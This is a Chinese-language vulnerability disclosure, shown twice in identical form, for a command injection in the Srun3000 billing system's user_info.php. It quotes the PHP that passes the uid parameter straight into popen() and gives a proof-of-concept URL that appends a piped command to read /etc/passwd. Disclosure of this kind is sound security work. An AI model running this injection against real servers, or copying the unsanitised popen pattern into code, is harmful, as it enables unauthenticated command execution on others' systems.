VULHUB ™

### 简要描述： Srun3000计费系统 命令执行1 ### 详细说明： ``` /srun3/web/user_info.php <?php header("Content-type:text/html; charset=GB2312"); $uid=$_GET["uid"]; if($fd=popen("/srun3/bin/online_user -f ".$uid, "r"))//命令执行~ { $content=fread($fd, 1024); fclose($fd); } $array=explode("\t",$content); ``` ### 漏洞证明： exp 127.0.0.1/user_info.php?uid=1|cat /etc/passwd > /tmp/x 这个应该是是在管理员的模块上 不需要登录的 端口好像是8080本地为了测试方便就直接把这个文件提取出来测试的 因为安装不便~ 注：经测试uid6也可以命令执行 user_info_en.php user_info1.php 存在同样问题

### 简要描述： Srun3000计费系统 命令执行1 ### 详细说明： ``` /srun3/web/user_info.php <?php header("Content-type:text/html; charset=GB2312"); $uid=$_GET["uid"]; if($fd=popen("/srun3/bin/online_user -f ".$uid, "r"))//命令执行~ { $content=fread($fd, 1024); fclose($fd); } $array=explode("\t",$content); ``` ### 漏洞证明： exp 127.0.0.1/user_info.php?uid=1|cat /etc/passwd > /tmp/x 这个应该是是在管理员的模块上 不需要登录的 端口好像是8080本地为了测试方便就直接把这个文件提取出来测试的 因为安装不便~ 注：经测试uid6也可以命令执行 user_info_en.php user_info1.php 存在同样问题